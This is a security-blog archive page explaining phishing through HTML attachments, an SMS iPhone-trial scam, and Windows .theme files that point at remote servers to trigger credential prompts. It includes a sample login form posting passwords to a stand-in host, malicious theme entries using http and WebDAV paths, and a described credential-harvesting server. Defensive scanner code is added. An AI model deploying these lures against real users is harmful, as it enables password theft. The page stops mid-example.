Category Archives: Phishing

Serious Security: Phishing without links – when phishers bring along their own web pages

In the past few days we received two phishing campaigns – one sent in by a thoughtful reader and the other spammed directly to us – that we thought would tell a useful visual story.

As far as we can tell, these scams originated from two different criminal gangs, operating independently, but they used a similar trick that’s worth knowing about.

The phishing scammer’s three-step

Most straight-up email phishing scams – and you’ve probably received hundreds or even thousands of them yourself in recent times – use a three-stage process:

  • Step 1. An email that contains a URL to click through to.

The message might claim to be telling you about an unpaid electricity bill, an undelivered courier item, a suspicious login to your online banking account, a special offer you mustn’t miss, or any of a wide range of other believable ruses.

Sometimes the crooks actually know your name and perhaps even your phone number and your address.

Sometimes the criminals are flying blind and stick to phrases such as “Dear Customer”, “Dear Sir/Madam” or even just “Hello.”

Sometimes they know the name of your electricity provider or bank; sometimes they don’t know but happen to guess correctly; sometimes they fudge the issue by writing some generic text that’s just enough to get your interest.

The email message doesn’t have to say a lot – all it needs to do is catch you at a weak moment so you click the link.

Clicking a phishing link ought to be safe enough on its own, provided you’re careful about what happens next, but it inevitably takes you one step closer to trouble.

  • Step 2. A web page where you need to login to go further.

Usually, after you’ve clicked through, there’s a password page, and often it’s a surprisingly good clone of the real thing, created simply by pirating the HTML, images, fonts, stylesheets and JavaScript from the genuine site and installing it somewhere else.

The imposter pages will often be sitting on a legitimate website that’s been hacked to act as a believable springboard for the attack.

Unpatched blogging sites are popular to hack because the crooks can often find somewhere perfectly innocent-looking and unlikely to be noticed, deep in the directory structure of the real site where a few extra images and HTML files won’t attract the attention of the site’s legitimate operator.

Or the imposter pages may be part of a short-lived web hosting account – perhaps set up just a day or two before as a “free trial” that will probably be shut down quickly, but not before the crooks will have cut and run anyway.

  • Step 3. A web site where the data you put into the login form gets sent.

Sometimes the “drop site” for the stolen data will be uploaded to the same site used in (2); sometimes the crooks use a third site that may be collecting data from several different phishing campaigns at the same time.

Technically speaking, the clickable link to site (2) appears inside email (1) as what’s known as a hyperlink, encoded into HTML using a so-called anchor tag, written as <A ...>, like this:

The text between the <A> and the </A> usually appears in your browser in blue to denote you can click it to follow a hyperlink jump to somewhere else.

But the clickable text itself isn’t where you go next.

The target of the link, often a URL pointing to another website, is given by the HREF=... value that appears along with the <A>:

(If you want to use the right jargon, you need to know that the <A> part is known as a tag, for which </A> is the matching closing tag. The HREF=... part is referred to as an attribute of the tag.)

Finding the password stealer

Usually, the fake login form that performs the password-stealing part of a phishing scam appears somewhere in the phoney web page on website (2).

So, if you ever need to go looking for the bogus login form, you’ll generally find it on site (2), which, as we just explained, is generally referenced by an HREF=... attribute in email (1).

This time, you’re looking for an HTML tag called <FORM>, and instead of using an HREF=... to denote the URL they’re linked to, form tags have an attribute called ACTION=... that tells your browser where to upload the completed form when you finish:

The button that finishes off your data entry and confirms you want to upload the data you just entered is denoted inside the form by an <INPUT> tag with an attribute that says TYPE="submit", as in the example above.

You might expect that hovering your mouse over the submit button in a form would pop up to show you where your data is going next, in the same way that it does when you hover over a hyperlink, but sadly no browser we know of does this:

Cutting out the middleman

The phishes that we mentioned at the start, one received directly by us and one kindly reported by a reader, worked on the three-step principle we’ve just described.

But there was one important difference.

Step (2), the cloned website with a phoney login page on it, wasn’t reached by clicking a link in the email.

Instead, the bogus web page was brought along for the ride as an HTML attachment, like this:

Opening the attachment doesn’t feel terribly dangerous – after all, it’s not a document that could contain macros and it’s not a PowerShell file or an executable program that could wreak instant havoc.

In theory, opening an HTML attachment should simply open up the enclosed web page in the comparative safety of your browser’s sandbox, as if you had clicked a link.

Like this:

When you open an HTML attachment like this, instead of clicking a conventional web link, there are two huge differences:

  • There is no link in the email that you could have checked out in advance to look for a fake or suspicious domain name.
  • The URL in the address bar is a harmless looking local filename, with no website name or HTTPS certificate you can examine for signs of bogosity.

There are other reasons not to open HTML attachments, notably to do with JavaScript. For safety’s sake, script code inside HTML emails is stripped or blocked when any modern email reader displays the message. That’s a precaution that email software introduced decades ago when self-spreading script viruses such as Kakworm literally spread everywhere. Kakworm’s script code would activate and the virus would spread as soon as the email was displayed, without waiting for you to click any further. When you open an HTML attachment, however, it is no longer under the strict controls of your email client software, and any JavaScript inside the HTML will be allowed to run by default by your browser.

Here’s another example, this time pretending to be a payment processed by SWIFT, a well-known international processing service for financial transactions. (International bank identification codes, now officially called BICs, are still widely known as SWIFT codes.)

Of course, neither Microsoft nor SWIFT had anything to do with this email, and there isn’t any payment you need to know about.

The message is just a ruse to make you wonder what’s going on here, and opening the attachment brings up a fake login page designed to phish your password:

The innocent address bar

With no clickable link to give the game away, the browser’s address bar is the obvious place where you’d look to try to verify the web page you just landed on.

As you can see above, the website details that show up for HTML attachments opened locally are just local URLs, starting with file:// instead of http:// or https://.

There’s no encryption to look for, and no TLS certificate you can check, because all you’re really doing is browsing a local temporary file.

In our case, they had names that are unexceptionable enough that we didn’t even bother to redact them in the images above:

file:///tmp/mozilla/Proforma Invoice.html
file:///tmp/mozilla/Payment 66603635.html

The URLs above are what we saw when we ran our test using a Linux email client and with the Firefox browser, but the results are similar on other platforms.

On Windows, for example, you’ll see something like this:

Tracking the FORM data

As explained above, filling in the forms in the fake HTML pages above will send off your password to websites controlled by the criminals.

Of course, email passwords are amongst the most valuable credentials for crooks to acquire, simply because many people use their email account for password resets on a multitude of other accounts.

So, criminals with control over your email account can probably wrest control of many of your other accounts, too, because any password reset emails will end up where the crooks can access them before you even realise that they’re taking over your digital life.

But how to check where a form in a web page will send your data when you submit it?

Unfortunately, we don’t know of any easy way that’s built in to any browser, but you can use your browser’s Developer Tools to do the trick.

In Edge, for example, pressing F12 and choosing the Elements tab will show you a visual view of the HTML structure of the web page:

Searching for the text ACTION (the search doesn’t care whether it’s upper or lower case) should reveal any URLs associated with forms on the page, as you see here:

We’ve redacted the URL here, but we will say that it very obviously had nothing to do with any Microsoft product or service, and immediately outed the login form as fraudulent.

In Firefox, the process is similar: Ctrl-Shift-I will bring up Mozilla’s Inspector toolbox.

Choose the Inspector tab and search for ACTION, and you should be able to track down the URLs used for data upload by any of the forms in the page:

In Safari on a Mac, the key combination to bring up the Inspector is Option-Command-I, after which a search will show you any occurrences of ACTION in the HTML source of the page:
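If you have saved the HTML attachment to disk, the same ACTION search can be done without opening the file in a browser at all. Here is an added example (not code from the original article) that lists every form in a page, where it posts to, and whether it collects a password; the sample HTML and the hostname phish.example are constructed for the demonstration.

```python
"""Triage an HTML attachment: list every <form> and where it will post.

Added example, not from the Naked Security article.  Standard library only.
The sample page below is constructed to resemble the bring-your-own-webpage
phish described in the article; phish.example is an RFC 2606 reserved name.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionFinder(HTMLParser):
    """Collect ACTION and METHOD of each <form>, plus its <input> types/names."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names; a bare
        # attribute (no value) arrives as None, so normalise that to "".
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {
                "action": attrs.get("action", ""),
                "method": attrs.get("method", "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (attrs.get("type", "text").lower(), attrs.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def classify_action(action):
    """Describe where a form's data goes when the page was opened via file://."""
    if not action.strip():
        # An empty ACTION submits back to the current document, i.e. the
        # local attachment itself, so nothing leaves the machine.
        return "self"
    u = urlparse(action)
    if u.scheme in ("http", "https") and u.netloc:
        return "remote:" + u.netloc.lower()
    if u.scheme:
        return "other:" + u.scheme
    # A relative ACTION on a file:// page resolves to another local path.
    return "relative"


def find_form_actions(html_text):
    """Return one summary dict per <form> found in html_text."""
    p = FormActionFinder()
    p.feed(html_text)
    return [{
        "action": f["action"],
        "method": f["method"],
        "destination": classify_action(f["action"]),
        "collects_password": any(t == "password" for t, _ in f["inputs"]),
    } for f in p.forms]


# Constructed sample: a look-alike login page delivered as an attachment.
SAMPLE_ATTACHMENT = """
<html><body>
<h1>Sign in to your account</h1>
<FORM METHOD="POST" ACTION="https://phish.example/drop/collect.php">
  <INPUT TYPE="text" NAME="email">
  <INPUT TYPE="password" NAME="passwd">
  <INPUT TYPE="submit" VALUE="Sign in">
</FORM>
<form action="">
  <input type="text" name="search">
</form>
</body></html>
"""

if __name__ == "__main__":
    for r in find_form_actions(SAMPLE_ATTACHMENT):
        leak = r["collects_password"] and r["destination"].startswith("remote:")
        flag = "!! password leaves the machine: " if leak else "   "
        print(f"{flag}{r['method'].upper()} {r['action'] or '(self)'} -> {r['destination']}")
```

A form whose destination is "remote:" some host you do not recognise is the same tell the Developer Tools search reveals, only here it can be run over a whole mailbox export.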

What to do?

The good news is that you don’t need to learn a whole new set of precautions to protect yourself from bring-your-own-webpage phishing scams.

Here’s what to do:

  • Avoid HTM or HTML attachments altogether unless they’re from someone you know and you are expecting them. We can’t recall ever receiving an emailed-in web page that wasn’t trying to trick us.
  • Avoid logging in on web pages that you arrived at from an email, whether you clicked on a series of links or opened an attachment to get there. If it’s a service you already know how to use – whether it’s your email, your banking site, your blog pages or a social media account – learn how to reach the login page directly. If you always find your own way to your account login pages, you’ll never be tempted by fakes.
  • Turn on 2FA if you can. Two-factor authentication means that you need a one-time login code, usually texted to your phone or generated by a special app, that changes every time. 2FA doesn’t guarantee to keep the crooks out, but it makes your password alone much less use to them if they do manage to phish it.
  • Change passwords at once if you think you just got phished. The sooner you change your current password after putting it into a site you subsequently suspect, the less time the crooks have to try it out. Similarly, if you get as far as a “pay page” where you enter payment card data and then realise it’s a scam, call your bank’s fraud reporting number at once. (Look on the back of your actual card so you get the right phone number.)
  • Use a web filter. A good anti-virus solution (Sophos Home is free for Windows and Mac) won’t just scan incoming content to stop bad stuff such as malware getting in, but will also check outbound web requests to stop good stuff such as passwords getting out. Even in “clickless” attacks like this, the password exfiltration relies on an outgoing web connection that a web filter could block.

Naked Security Live – “SMS scams: keep yourself and your family safe!”

We do a show on Facebook every week in our Naked Security Live video series, where we discuss one of the big security concerns of the week.

We’d love you to join in if you can – just keep an eye on the @NakedSecurity Twitter feed or check our Facebook page on Fridays to find out the time.

It’s usually about 18:00 UK time, which is early afternoon/late morning on the East/West coast of North America.

Note that you don’t need a Facebook account to watch our live streams, although you will need to login if you want to ask questions or post comments.

For those of you who [a] don’t use Facebook, [b] had buffering problems while we were live, [c] would like subtitles, or [d] simply want to catch up later, we also upload the recorded videos to our YouTube channel.

Here’s last week’s video, where we showed you how to keep yourself, and your friends and family, safe from phishing scams that arrive via SMS – what’s colloquially known as “smishing”:


(Watch directly on YouTube if the video won’t play here.)

Thanks for watching… hope to see you online later this week!


SMS phishing scam pretends to be Apple “chatbot” – don’t fall for it!

Aren’t SMSes dead? Aren’t they just plain old text anyway? Surely they’re of no interest to cybercriminals any more?

Well, SMSes aren’t dead at all – they’re still widely used because of their simplicity and convenience.

Indeed, as a general-purpose short message service – which is literally what the letters SMS stand for – it’s hard to beat, because any phone can receive text messages, from the fanciest smartphone to the cheapest pre-paid mobile.

If all you need to transmit is a 6-digit logon code or a “pizza driver now 2 minutes away” notification, SMSes still make excellent business sense.

Sadly, however, what works for legitimate businesses almost always works for cybercriminals too, so there are plenty of crooks still using SMSes for phishing – an attack that’s wryly known as smishing.

You can see why SMSes work for crooks.

With just 160 characters per message, it’s easy for them to avoid the grammatical and stylistic blunders that they often make when they’re forced to produce longer-format email messages in a language they don’t speak well.

Better yet, business SMSes generally use URL shorteners to save space, giving the criminals an excuse to do the same.

URL shorteners convert lengthy but meaningful web addresses such as https://brandname.example.com/pizza-order.html?lang=en-US into a compressed but cryptic format such as https://xx.test/ABXt that frees up characters for the rest of the SMS, but disguises where the link is going to end up.

Hovering over a shortened link doesn’t help, because the link only denotes the shortening site you’ll visit first, not the final destination. The link shortening site uses the characters after the website name (ABXt in our made-up example above) as an index to look up the real destination and then sends an HTTP 301 Moved Permanently reply to tell your browser where to go next. You need to click through to the shortening site first before you find out where you are supposed to end up.

The SMS system, of course, doesn’t know anything about URLs or even about the internet – but it doesn’t need to.

Your phone’s operating system will happily recognise when the text in an SMS looks like a URL and automatically make it clickable for you.

So, when the crooks use shortened URLs in their smishing scams, they don’t look unusual or out of place, even though the crooks are doing it specifically to be treacherous and not to save space.

As a result, text messages that contain one short, clipped sentence that wouldn’t look right in an email, and that contain deliberately disguised links that we might be suspicious of anywhere else…

…look surprisingly natural when they show up in an SMS.

Like this one we received earlier this week. (We’re not called Christopher and we don’t live in Derry, which is in Northern Ireland. The incomplete address given is a genuine suburban street, presumably plucked from a map to make it seem realistic.)

Dear Christopher, we have your packet in queue. Address: Londonderry, Ballynagard crescent
http COLON SLASH SLASH xxxxxxxx DOT com SLASH zzzzzzz

The message is meant to look as though it was sent to the wrong number, so the crooks are relying on you being intrigued enough to click through, whereupon they use some sneaky “reverse authentication” psychology to lure you in further.

The scam first shows you some cheery messages from a fake Apple chatbot to tell you why you – actually, to tell you why Christopher – had enough luck to be chosen to take part in an iPhone 12 trial, and then it invites you – actually, it invites Christopher – to join in:

Here, the link looks genuine, but the blue characters are simply the clickable text of the link, not the URL that is the destination of the link.

At this point, you’re no longer in the SMS messaging app but have clicked through into your browser, so you can see where the fake link leads if you hover your mouse over it. (On a phone, tap-and-hold on the link until the destination pops up.)

But if you aren’t cautious, you might wonder whether “Christopher” really was part of some Apple pre-release group.

What if you claim Christopher’s promo for yourself?

In fact, what’s stopping you from simply clicking through as if you were Christopher and finding out for yourself?

Well, one thing is stopping you, namely that you have to “prove” yourself by giving your full name and address – except, of course, that the crooks helpfully leaked that information to you in the original text, making the “test” easy to pass.

You can guess what happens next:

In case you’re wondering, the name-and-address answers above in part 3/5 don’t matter a jot. We tried clicking numerous different combinations and, unsurprisingly, the crooks let us through anyway. The questions are there just to provide a plausible connection back to the SMS that was meant for “Christopher” but that reached you instead. It’s as though the criminals are trying to “authenticate” themselves to you, rather than the other way around.

As you see above, if you do click through the questions then you end up on a scam site (there were several variations, all similar – we tried the smish repeatedly) where you find there’s a courier delivery charge for the “free” phone, typically between £1 and £2.

Then you end up on a credit card payment form that’s hosted on what looks like a “special offers” website with a believable enough name, and with an HTTPS security padlock if you take the time to look.

Of course, if you try to pay your modest delivery charge, you are simply handing over your personal data to the crooks, including your full card number and security code:

How bad is this?

Is this really a big deal, given that most of us would back ourselves to spot this as a scam right from the start?

Yes, it is.

Many of us have friends or family – perhaps even an at-risk relative who has been scammed before – who wouldn’t be so sure, and for whom the reverse authentication trick of asking for “Christopher’s” name and address might be convincing enough to draw them in further.

And friends don’t let friends get scammed, so if ever you get asked by someone who relies on you for cybersecurity help, “So what would happen if I clicked through?”…

…you can show them the short video above and let them see how these scams play out – without having to click through yourself.

What to do?

  • There is no free phone. And if there were a free phone, you wouldn’t have to hand over your credit card details and pay £1 for it. You’re not getting something for nothing – you’re handing over something for nothing, and the crooks will use it against you. If you’re in any doubt, don’t give it out.
  • Keep your eyes open for clues. The crooks have made numerous spelling and visual blunders in this scam. We’re not going to help them by listing them all like your English Language teacher would have done at school, but there are quite a few things that just don’t look right, even if you assume that there really is a free phone at the end of this. You might not always notice every clue, but always give yourself the time to look and therefore the best chance to catch out the crooks.
  • Look at the link before you click. If anything looks wrong, it IS wrong. Even if the crooks don’t make any spelling or grammatical mistakes they almost always need to lead you to a website that they control. Often, that means a bogus link that you ought to spot if you take your time. Never let yourself get rushed into clicking through, no matter how much the crooks play on your fear of missing out.
  • Consider a web filter. Network web filtering on your business network isn’t about surveillance, it’s about online safety. This helps you keep the bad stuff out, and helps your users keep the good stuff in, such as passwords and payment card numbers. Setting up a corporate VPN (virtual private network) means that users at home can browse securely back through the office network and enjoy the same protection that they’d have on the LAN at work.

Serious Security: Hacking Windows passwords via your wallpaper

Our cybersecurity antennae always start vibrating when we see warnings about attacks that involve a new type of file.

We’re sure you have the same sort of reaction.

After all, if a file type that you’ve treated for years as mostly harmless suddenly turns out to be possibly very dangerous, you’re faced with a double dilemma:

  • How long will it take to unlearn an ingrained habit of trusting those files?
  • How long will the crooks take to start abusing this new-found knowledge?

We’re all aware of the risks posed by unknown EXE files, for example, because EXE is the extension for native Windows programs – even the operating system itself is implemented as a collection of EXEs.

Most of us also know to be wary of DLLs, which are actually just a special type of EXE file with a different extension to denote that they’re usually used in combination with other programs, rather than loaded on their own.

We’ve learned to be wary of DOCs and DOCXs and all the other Office filetypes, too, because they can include embedded programs called macros.

We’re also aware of a range of risky script files such as JS (for JavaScript), VBS (Visual Basic Script), PS1 (PowerShell) and many others that are plain old text files to the untrained eye, but are treated as a series of system commands when processed by Windows itself.

We’ve even taught ourselves to be wary of the extent to which Windows itself misleads us because of its default approach to filenames – as in the case of the files alert and alert.txt below, which go out of their way to convince us they’re just innocent text:

Forget what they look like: those old-school icons on the left that give the impression of being medieval scrolls don’t denote plain old written text at all.

Ironically, however, the icon in the middle that looks like a crisply modern digital document, and that goes with a file that’s actually called document, really is a text file.

By default, Windows suppresses filename extensions, which are the all-important characters that follow the last dot in a filename, such as the .docx at the end of the Word file TaxReturn.docx or the .exe at the end of the program Notepad.exe.

Annoyingly, Windows itself very often uses extensions to decide what to do when you click on a file – for example, whether to view it harmlessly or to execute it riskily.

Yet the operating system rather patronisingly assumes that you don’t need to bother yourself with those pesky extra letters at the end of your filenames.

Indeed, if we turn on the View > File name extensions option (highly recommended!) in File Explorer, you’ll see the dangerous truth behind those “scroll icon” files that looked above as though they were called alert and alert.txt:

In real life, those are .js files, and if you double click on them thinking you are about to open them up to view their contents, then you will get an unpleasant surprise.

Windows will automatically run them as all-powerful JavaScript programs – not in the comparative safety of your web browser, but directly on your computer as local apps.

(Apparently that icon doesn’t represent a scroll. It’s meant to be a script. Who knew?)

Enter the Theme file

At the right-hand side of the images above, you’ll see files with the extension .theme, denoted by icons that depict what look like a series of background images.

We’re willing to bet that if you’ve ever downloaded and used .theme files (or .themepack files, which are just a collection of .theme files bundled together), you’ve not worried too much about security.

Very loosely speaking, Windows Themes are just INI-style text files that specify various settings for background colours, wallpapers, and visual effects.

Here’s a simple example, a copy of the file justatest.theme depicted above:

[Theme]
DisplayName=JustATest

[Control Panel\Desktop]
Wallpaper=C:\Users\duck\Pictures\justatest.png
TileWallpaper=0
WallpaperStyle=10
Pattern=

[VisualStyles]
Path=%SystemRoot%\resources\themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
ColorizationColor=0X6B74B8FC
Transparency=1

[MasterThemeSelector]
MTSM=DABJDKT

(No, we don’t know what the text MTSM=DABJDKT in the last line means or what it’s for; we just know that Microsoft insists that you have it in the file and says, “You do not have a choice of values for this parameter.”)

Admittedly, just loading untrusted image files, such as the Wallpaper file specified above, can theoretically be dangerous.

That’s assuming there’s an unpatched vulnerability in one of your apps, or in Windows itself, that can be reliably exploited to trick your computer into running a fragment of executable code when a deliberately crafted image file is opened.

In practice, however, that type of vulnerability is rare these days – those that are found are either quickly patched or jealously guarded, and can usually be triggered by delivering a booby-trapped image directly to your computer in a web page or an email rather than relying on a Theme file to reference them indirectly.

The danger posed by booby-trapped Themes is therefore both small and manageable – giving .theme files a justifiable assessment of mostly harmless.

Despite their generally low direct risk, .theme files nevertheless received a public airing in the notorious “Vault 7” data dump back in 2017, when WikiLeaks exposed a massive trove of confidential documents allegedly stolen from the CIA. Vault 7 included a knowledgebase article, supposedly from the CIA’s Information Operations Centre, remarking that Themes might be handy as a way of amplifying the effect of an existing exploit by allowing multiple variants of the exploit to be delivered in one go: “[I]n the cases where your execution vector uses icon rendering/file previews to exploit (link files, font files), a theme file can allow you to point to up to three other files and render them from one.”

Harmful after all

But some recent digging by a security researcher going by @bohops revealed that Themes are open to abuse by cybercriminals after all – albeit in an indirect way to phish for passwords rather than directly to implant malware on your computer.

Traditionally, .theme files are used simply as a way of triggering the automatic installation and rendering of one or more local files – indeed, that’s how the CIA envisaged using them for activating exploits:

In the animation above, you can see how double-clicking a .theme file launches the Windows Settings app, automatically navigates to the Preferences > Themes section, and then opens, copies, selects and renders the new wallpaper file justatest.png onto our desktop.

What if?

So far, things haven’t been very worrying.

Bohops, however, put his “What if?” cybersecurity research hat on, and wondered what might happen if he used a Theme file to reference images out on the internet, using web URLs instead of regular filenames.

Like this, taken from the file called justahack.theme seen above:

[Theme]
DisplayName=JustAHack

[Control Panel\Desktop]
Wallpaper=https://themefile.test/justahack.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
. . . .

All we’ve changed is the DisplayName of the Theme itself and the “filename” specified on the Wallpaper line.

In our real-world tests, we used a genuine domain name pointing at a test server of our own, fitted out with a genuine HTTPS certificate from Let’s Encrypt. Here, however, we have redacted the site name and replaced it with a special use domain name, as detailed in RFC 2606 and RFC 6761. We urge you to follow these RFCs in your own cybersecurity articles and documentation. By sticking to IP numbers and domain names that are realistic but will never be allocated in real life, you avoid the risk that someone might blindly copy and paste your examples into one of their own tests and subject some innocent third party to an inadvertent, annoying and possibly even dangerous attack.

Bohops realised that the Settings app will honour the URL in the Theme file, automatically connecting to it without showing you any sort of browser window, and attempting to fetch the file that’s referenced.

That’s slightly more worrying than reading a file that’s already on your computer, but probably still not enough to reclassify Themes as much worse than mostly harmless.

One step further

Bohops was able to go one step further, however.

The trick he figured out was simple but surprisingly effective: point the Theme file at a web server you control, configure your website to require authentication, and see if the Windows computer will supply you with a password.

We did that by mocking up a web server of our own in a few lines of Lua so we could track how the Settings app behaved.

In our server script, we collected the HTTP headers and used a basic HTTP 401 response (“must authenticate”) when the Settings app first came calling.

Here, we check that the web request doesn’t yet contain an Authorization header, which is how a web client denotes that it has already gone through the logon process:

Note that with HTTP Basic authentication, we get to choose the message that we’d like the other end to display when it prompts for your credentials.

The client responds to a 401 Must authenticate reply by collecting your username and password somehow, combining them into a text string with a colon (:) between, encoding them using Base64, and including the result in its next attempt to fetch the file.

Here’s what happened:

Notice how the credential popup is tagged as belonging to the Windows Settings app rather than your browser, giving it a credibility it doesn’t really deserve.

You should spot the subterfuge, of course, because the password dialog explicitly states the website name it’s connecting to, and makes it clear that it’s the website that’s asking for the password and providing the explanatory text, not Windows itself:

Password dialog when file is specified via an HTTPS link.

The Settings app will even connect to a non-HTTPS site to fetch Theme files (we tried it to see), though it will warn you not to put in your password due to the lack of encryption:

Password dialog if an unencrypted HTTP link is used for the file.

(If you try to use HTTPS but don’t supply a valid web certificate that Windows trusts, the Settings app will give up silently.)

Does it get worse?

As Bohops and others have pointed out, you can use a Windows UNC path instead of a website name in a Theme file, which tells Windows to use its file-based networking instead of a regular HTTP connection to retrieve the file.

UNC paths are well-known to users of Windows networking, and usually rely on Windows computer names and network share names, such as \\YOURPC\C$\Windows\System32\NOTEPAD.EXE

But you can put an internet domain name or an IP number into a Windows UNC name, and Windows will automatically trigger its built-in WebDAV client to fetch the file, instead of using its own networking protocols.

WebDAV is short for Web Distributed Authoring and Versioning, and it’s a modified flavour of HTTP used to present network-based data stores as files and directories, much like a regular local or networked filing system such as NTFS or CIFS.

We were able to get Settings to use WebDAV over TLS by specifying our wallpaper like this:

[Theme]
DisplayName=NowWithWebDAV

[Control Panel\Desktop]
Wallpaper=\\themefile.test@SSL@443\nowwithwebdav.png
TileWallpaper=0
WallpaperStyle=10
Pattern= . . . .
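A defender’s counterpart to the Theme file above is a scanner that reads a .theme file and flags any resource that would make Windows reach off the computer, whether via an http:// or https:// URL or via a UNC path such as the @SSL@443 form shown. This is an added Python example, not code from the article or from Microsoft; the sample Theme file inside it is constructed (the cursor entry is a normal local path), and treating any @ in the UNC host part as WebDAV-style addressing is an assumption based on the page’s own example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed Theme file modelled on the page's WebDAV wallpaper example.
# Only the Wallpaper line points off the box; the cursor entry is a local path.
SAMPLE_THEME = r"""[Theme]
DisplayName=NowWithWebDAV

[Control Panel\Desktop]
Wallpaper=\\themefile.test@SSL@443\nowwithwebdav.png
TileWallpaper=0
WallpaperStyle=10

[Control Panel\Cursors]
Arrow=%SystemRoot%\cursors\aero_arrow.cur
"""

# \\host\share\... : capture the host part (everything up to the next backslash)
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")


def parse_theme(text):
    """Minimal INI reader returning (section, key, value) for every key=value
    line. Hand-written so odd keys, duplicates and elided values do not raise."""
    section = None
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip(), value.strip()))
    return entries


def classify_value(value):
    """Label where a resource value would make Windows go:
    'https-url', 'http-url', 'unc-webdav', 'unc' or 'local'."""
    lower = value.lower()
    if lower.startswith("https://"):
        return "https-url"
    if lower.startswith("http://"):
        return "http-url"
    m = UNC_RE.match(value)
    if m:
        # host@SSL@443 is the WebDAV-over-TLS spelling used on the page; any '@'
        # in the host part is treated as WebDAV-style addressing (assumption).
        return "unc-webdav" if "@" in m.group(1) else "unc"
    return "local"


def resource_host(value, kind):
    """Pull the host out of a URL or UNC value; empty for local paths."""
    if kind in ("https-url", "http-url"):
        return urlsplit(value).hostname or ""
    if kind in ("unc-webdav", "unc"):
        return UNC_RE.match(value).group(1)
    return ""


def looks_like_internet_host(host):
    """True for an IP address or a dotted DNS name, False for a bare
    NetBIOS-style name such as YOURPC. Any @SSL/@port suffix is ignored."""
    base = host.split("@", 1)[0]
    try:
        ipaddress.ip_address(base)
        return True
    except ValueError:
        return "." in base


def scan_theme(text):
    """Return one finding per key whose value is not a local path."""
    findings = []
    for section, key, value in parse_theme(text):
        kind = classify_value(value)
        if kind == "local":
            continue
        host = resource_host(value, kind)
        findings.append({
            "section": section,
            "key": key,
            "value": value,
            "kind": kind,
            "host": host,
            "internet_host": looks_like_internet_host(host),
        })
    return findings


if __name__ == "__main__":
    for f in scan_theme(SAMPLE_THEME):
        print(f"[{f['section']}] {f['key']} -> {f['kind']} host={f['host']}"
              f" internet={f['internet_host']}")
```

Every key is inspected rather than just Wallpaper, since the scanner does not need to know which Theme keys Windows will actually fetch; anything that names a remote host is worth a look before the file is opened.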

In theory, getting Windows to connect to a WebDAV resource that requires authentication ought to provoke a Windows-style network login popup, using Windows NTLM (native) authentication rather than the less convincing HTTP-style credential popup that we saw above.

This would make it more likely that a rogue Theme file could trick you into putting in your regular Windows username and password, although NTLM authentication uses a challenge-response hashing system that means the plaintext of your password would not be revealed as it was above when we forced HTTP Basic authentication.

An attacker using the UNC approach would therefore have to collect a hash of your password and crack it – somewhere between very difficult and impossible if you have chosen wisely.

Nevertheless, cybercriminals might be able to recover a poorly-chosen password if they have plenty of computer power to throw at the cracking task (which can be done offline).

We got nowhere

We weren’t able to get anywhere using UNC filenames, however.

We were able to get Windows to make a secure WebDAV connection to our mocked-up WebDAV server, where we could monitor the requests from the Settings app.

Once again, we used a stripped-down Lua server, and this time we recorded this transcript:

===Connection 1 opened
...trying TLS
+++using TLS
request--> OPTIONS /justahack.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
translate: f
host: themefile.test
reply<---- HTTP/1.1 204 No Content
MS-Author-Via: DAV
DAV: 1, 2
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK, ACL
Content-Length: 0
===Closed 1
===Connection 2 opened
...trying TLS
+++using TLS
request--> PROPFIND /nowwithwebdav.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
depth: 0
translate: f
content_length: 0
host: themefile.test
reply<---- HTTP/1.1 401 Must authenticate
WWW-Authenticate: NTLM
Content-Length: 0
Connection: close
===Closed 2

The session opens with an OPTIONS command, where the client verifies that it’s talking to a WebDAV server rather than to an HTTP server that lacks the WebDAV extensions.

The command PROPFIND that follows is essentially the WebDAV equivalent of the Windows function pair FindFirstFile()/FindNextFile(), and shows us which file Windows wants to download.

We replied to Windows and requested the use of HTTP NTLM authentication.

Other researchers who have looked into WebDAV behaviour in the past have reported that the WebDAV client reacts to HTTP NTLM authentication demands by repeating its original unauthenticated request several times, before finally conceding defeat and going through the NTLM challenge-response process.

This ultimately reveals a hashed version of your Windows password that can be attacked, and possibly cracked if the attacker is lucky.

However, in the tests where we double-clicked on Theme files that specified a remote UNC resource, we were not able to provoke Settings into attempting authentication at all, let alone revealing a Windows password hash.

After 19 attempts to locate the nowwithwebdav.png file without authentication, the Settings app gave up every time.
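The question the authors were answering from their server log, namely whether the client ever sent credentials after being challenged, is one you can settle mechanically from a transcript in this layout. The following is an added Python example, not the article’s Lua server, that parses the request/reply markers of the mock server’s log into one record per request and then summarises, per requested path, how many attempts arrived, how many carried any Authorization header, and how many were met with a 401 and which scheme was offered. The transcript embedded in it is constructed: the first two connections copy the page’s transcript, and the third is a made-up repeat of the PROPFIND standing in for the retries the article saw.

```python
import re
from collections import defaultdict

# Constructed transcript in the same layout as the page's mock-server log.
# Connection 3 is an invented repeat of the PROPFIND; none of this is real traffic.
SAMPLE_TRANSCRIPT = """\
===Connection 1 opened
...trying TLS
+++using TLS
request--> OPTIONS /justahack.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
translate: f
host: themefile.test
reply<---- HTTP/1.1 204 No Content
MS-Author-Via: DAV
DAV: 1, 2
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK, ACL
Content-Length: 0
===Closed 1
===Connection 2 opened
...trying TLS
+++using TLS
request--> PROPFIND /nowwithwebdav.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
depth: 0
translate: f
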